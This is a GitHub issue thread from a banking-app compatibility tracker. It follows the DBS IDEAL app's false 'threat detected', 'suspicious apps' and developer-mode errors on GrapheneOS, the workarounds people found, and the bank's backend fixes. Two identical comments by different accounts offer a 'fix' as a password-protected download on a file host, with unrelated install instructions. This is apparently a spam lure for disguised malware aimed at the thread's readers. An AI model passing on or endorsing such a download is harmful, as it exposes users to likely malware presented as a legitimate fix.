### ISSUE TITLE
DBS IDEAL Mobile

### ISSUE THREAD

**Issue by MatthK** [PrivSec-dev/banking-apps-compat-report#494]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### App name

DBS IDEAL

### Link to app

https://play.google.com/store/apps/details?id=com.dbs.ideal

### App version

V3.16.2

### Country of the app

Hong Kong

### Build Number

2024082200

### Device list

Pixel 7 Pro

### Profile app tested in

Secondary profile(s)

### Google Play installed?

Installed

### Where did you install this app from?

Google Play Store

### Google Play services Network permission revoked?

- [ ] Revoked
- [X] Not revoked
- [ ] I did not have Google Play services installed

### Native code debugging

- [X] Allowed
- [ ] Blocked

### Exploit protection compatibility mode

- [X] Enabled
- [ ] Disabled

### Memory tagging extension (MTE)

- [ ] Enabled
- [ ] Disabled
- [X] N/A

### Stock OS compatibility

- [ ] Works
- [ ] Does not work
- [X] Not tested

### NFC payments

- [ ] Works
- [ ] Works but requires another service
- [ ] Does not work
- [X] N/A (Not supported by app)
- [ ] Not tested

### Description of the app's functionality

The app previously worked fine. But recently (not sure I did an update), it shows that there is a threat detected on the phone. The threat is "N/A". After acknowledging the message, the app closes.
If you have previously had it installed and working, DO NOT delete the app and try to re-install. As long as it is installed, you can usually still authenticate/swipe despite the error message.

### Are there any extra notes you think users should know about?

DBS support has been informed and I am waiting for their reply.

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by spring-onion** [comment]
Thank you. I was able to replicate this, have you gotten a response yet?

**Comment by MatthK** [comment]
Unfortunately not, no. I will try to follow up with them.

**Comment by spring-onion** [comment]
Alright, for now I'll mark it incompatible.

**Comment by spring-onion** [comment]
For a brief moment it told me (one of) the detected threat(s) was "VIRTUAL", perhaps it's thinking it's being emulated.

**Comment by MatthK** [comment]
DBS has updated the app and it now works with GrapheneOS.

**Comment by hydraraptor81** [comment]
> DBS has updated the app and it now works with GrapheneOS.

Did not test digital token functionality of app, but normal login should work perfectly fine. Yep, before that it was broken.

**Comment by hydraraptor81** [comment]
Post Android 16, 2025070800 update, app now claims that there is "Suspicious Apps" and lists it as "N/A" or a "Modified Device" message will pop up.

**Comment by spring-onion** [comment]
For me it alternates between the suspicious apps screen and developer mode detected depending on whether native code debugging is permitted or not.

**Comment by hydraraptor81** [comment]
On version 3.21.3, 2026030701 update (for some time already actually, just did not bother to report), app says "suspicious apps" "There is unsafe software (malware) on your device" 

- Unlock bootloader

unlocked bootloader == unsafe software (malware) lol

No further action needed on the issue, just additional info.
I have contacted the bank to fix the issue, will update if anything comes of it.

**Comment by hydraraptor81** [comment]
On version 3.21.3 (no updates to the app), 2026042101, pixel 6a and pixel 9, the app works without issues again after contacting the bank, something seemed to have changed on their backend.

**Comment by MatthK** [comment]
Indeed, it works again. Good news. So it seems the repeated nagging at their support does work. Hopefully it'll stay that way.

**Comment by hydraraptor81** [comment]
App used to work with the old secure app spawning implementation before 2026071101 , it no longer works with the new implementation now. The app now claims that developer mode is once again enabled when it isn't.  To fix this, simply use the per app toggle and disable secure app spawning for the time being.

Their technical team earlier also insisted that custom OSes are not supported and they "recommended" me to use "stock OS" instead. In fact they even mistakenly insisted that my bootloader was unlocked when it never was in the first place.

Edit: Native Code Debugging is still required, i tested it on another device which had it disabled which is still the primary reason for the app not working, secure app spawning (new implementation on 2026071101 release) seems okay now for DBS IDEAL only this does not apply for other DBS apps.
